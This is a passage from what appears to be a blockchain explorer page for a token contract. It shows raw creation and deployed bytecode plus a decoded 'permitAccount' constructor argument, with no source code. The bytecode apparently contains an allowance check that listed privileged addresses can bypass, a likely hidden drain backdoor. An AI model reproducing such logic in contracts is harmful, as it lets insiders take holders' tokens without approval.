f168373ffffffffffffffffffffffffffffffffffffffff1603610914575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161090b9190610e83565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156109fd578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516109f49190610dd7565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a53578060035f828254610a47919061100b565b92505081905550610b21565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610adc578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610ad393929190610fd6565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b68578060035f8282540392505081905550610bb2565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c0f9190610dd7565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610c53578082015181840152602081019050610c38565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610c7882610c1c565b610c828185610c26565b9350610c92818560208601610c36565b610c9b81610c5e565b840191505092915050565b5f6020820190508181035f830152610cbe8184610c6e565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610cf382610cca565b9050919050565b610d0381610ce9565b8114610d0d575f80fd5b50565b5f81359050610d1e81610cfa565b92915050565b5f819050919050565b610d3681610d24565b8114610d40575f80fd5b50565b5f81359050610d5181610d2d565b92915050565b5f8060408385031215610d6d57610d6c610cc6565b5b5f610d7a85828601610d10565b9250506020610d8b85828601610d43565b9150509250929050565b5f8115159050919050565b610da981610d95565b82525050565b5f602082019050610dc25f830184610da0565b92915050565b610dd181610d24565b82525050565b5f602082019050610dea5f830184610dc8565b92915050565b5f805f60608486031215610e0757610e06610cc6565b5b5f610e1486828701610d10565b9350506020610e2586828701610d10565b9250506040610e3686828701610d43565b9150509250925092565b5f60ff82169050919050565b610e5581610e40565b82525050565b5f602082019050610e6e5f830184610e4c565b92915050565b610e7d81610ce9565b82525050565b5f602082019050610e965f830184610e74565b92915050565b5f60208284031215610eb157610eb0610cc6565b5b5f610ebe84828501610d10565b91505092915050565b5f8060408385031215610edd57610edc610cc6565b5b5f610eea85828601610d10565b9250506020610efb85828601610d10565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610f4957607f821691505b602082108103610f5c57610f5b610f05565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610f9982610d24565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203610fcb57610fca610f62565b5b600182019050919050565b5f606082019050610fe95f830186610e74565b610ff66020830185610dc8565b6110036040830184610dc8565b949350505050565b5f61101582610d24565b915061102083610d24565b925082820190508082111561103857611037610f62565b5b9291505056fea26469706673582212200db204bff54bdb89a1ac43a5045462aa0fdf82b74c14ca368cefad041dd20ea164736f6c63430008170033000000000000000000000000dbe52f736c55265e36d56aefa7b919727d2c8a3e

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100e8575f3560e01c806361bc221a1161008a57806395d89b411161006457806395d89b411461024e578063a9059cbb1461026c578063b4455a201461029c578063dd62ed3e146102ba576100e8565b806361bc221a146101e2578063637310801461020057806370a082311461021e576100e8565b806323b872dd116100c657806323b872dd14610158578063313ce5671461018857806338b90333146101a65780635d4f7a24146101c4576100e8565b806306fdde03146100ec578063095ea7b31461010a57806318160ddd1461013a575b5f80fd5b6100f46102ea565b6040516101019190610ca6565b60405180910390f35b610124600480360381019061011f9190610d57565b61037a565b6040516101319190610daf565b60405180910390f35b61014261039c565b60405161014f9190610dd7565b60405180910390f35b610172600480360381019061016d9190610df0565b6103a5565b60405161017f9190610daf565b60405180910390f35b6101906103d3565b60405161019d9190610e5b565b60405180910390f35b6101ae6103db565b6040516101bb9190610dd7565b60405180910390f35b6101cc6103e1565b6040516101d99190610dd7565b60405180910390f35b6101ea6103e7565b6040516101f79190610dd7565b60405180910390f35b6102086103ed565b6040516102159190610e83565b60405180910390f35b61023860048036038101906102339190610e9c565b6103f1565b6040516102459190610dd7565b60405180910390f35b610256610436565b6040516102639190610ca6565b60405180910390f35b61028660048036038101906102819190610d57565b6104c6565b6040516102939190610daf565b60405180910390f35b6102a46104e8565b6040516102b19190610ca6565b60405180910390f35b6102d460048036038101906102cf9190610ec7565b610574565b6040516102e19190610dd7565b60405180910390f35b6060600480546102f990610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461032590610f32565b80156103705780601f1061034757610100808354040283529160200191610370565b820191905f5260205f20905b81548152906001019060200180831161035357829003601f168201915b5050505050905090565b5f806103846105f6565b90506103918185856105fd565b600191505092915050565b5f600354905090565b5f806103af6105f6565b90506103bc85828561060f565b6103c7858585610744565b60019150509392505050565b5f6009905090565b60065481565b6103e881565b60085481565b5f81565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606005805461044590610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461047190610f32565b80156104bc5780601f10610493576101008083540402835291602001916104bc565b820191905f5260205f20905b81548152906001019060200180831161049f57829003601f168201915b5050505050905090565b5f806104d06105f6565b90506104dd818585610744565b600191505092915050565b600780546104f590610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461052190610f32565b801561056c5780601f106105435761010080835404028352916020019161056c565b820191905f5260205f20905b81548152906001019060200180831161054f57829003601f168201915b505050505081565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61060a8383836001610834565b505050565b5f61061a8484610574565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81101561073e578181101561072f578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614806106cc575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b156106ed5760085f8154809291906106e390610f8f565b919050555061072e565b8281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161072593929190610fd6565b60405180910390fd5b5b61073d84848484035f610834565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107b4575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107ab9190610e83565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610824575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161081b9190610e83565b60405180910390fd5b61082f838383610a03565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036108a4575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161089b9190610e83565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610914575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161090b9190610e83565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156109fd578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516109f49190610dd7565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a53578060035f828254610a47919061100b565b92505081905550610b21565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610adc578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610ad393929190610fd6565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b68578060035f8282540392505081905550610bb2565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c0f9190610dd7565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610c53578082015181840152602081019050610c38565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610c7882610c1c565b610c828185610c26565b9350610c92818560208601610c36565b610c9b81610c5e565b840191505092915050565b5f6020820190508181035f830152610cbe8184610c6e565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610cf382610cca565b9050919050565b610d0381610ce9565b8114610d0d575f80fd5b50565b5f81359050610d1e81610cfa565b92915050565b5f819050919050565b610d3681610d24565b8114610d40575f80fd5b50565b5f81359050610d5181610d2d565b92915050565b5f8060408385031215610d6d57610d6c610cc6565b5b5f610d7a85828601610d10565b9250506020610d8b85828601610d43565b9150509250929050565b5f8115159050919050565b610da981610d95565b82525050565b5f602082019050610dc25f830184610da0565b92915050565b610dd181610d24565b82525050565b5f602082019050610dea5f830184610dc8565b92915050565b5f805f60608486031215610e0757610e06610cc6565b5b5f610e1486828701610d10565b9350506020610e2586828701610d10565b9250506040610e3686828701610d43565b9150509250925092565b5f60ff82169050919050565b610e5581610e40565b82525050565b5f602082019050610e6e5f830184610e4c565b92915050565b610e7d81610ce9565b82525050565b5f602082019050610e965f830184610e74565b92915050565b5f60208284031215610eb157610eb0610cc6565b5b5f610ebe84828501610d10565b91505092915050565b5f8060408385031215610edd57610edc610cc6565b5b5f610eea85828601610d10565b9250506020610efb85828601610d10565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610f4957607f821691505b602082108103610f5c57610f5b610f05565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610f9982610d24565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203610fcb57610fca610f62565b5b600182019050919050565b5f606082019050610fe95f830186610e74565b610ff66020830185610dc8565b6110036040830184610dc8565b949350505050565b5f61101582610d24565b915061102083610d24565b925082820190508082111561103857611037610f62565b5b9291505056fea26469706673582212200db204bff54bdb89a1ac43a5045462aa0fdf82b74c14ca368cefad041dd20ea164736f6c63430008170033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000dbe52f736c55265e36d56aefa7b919727d2c8a3e

-----Decoded View---------------
Arg [0] : permitAccount (address): 0xDbE52F736c55265e36d56AEFa7b919727d2c8A3e

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000dbe52f736c55265e36d56aefa7b919727d2c8a3e


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.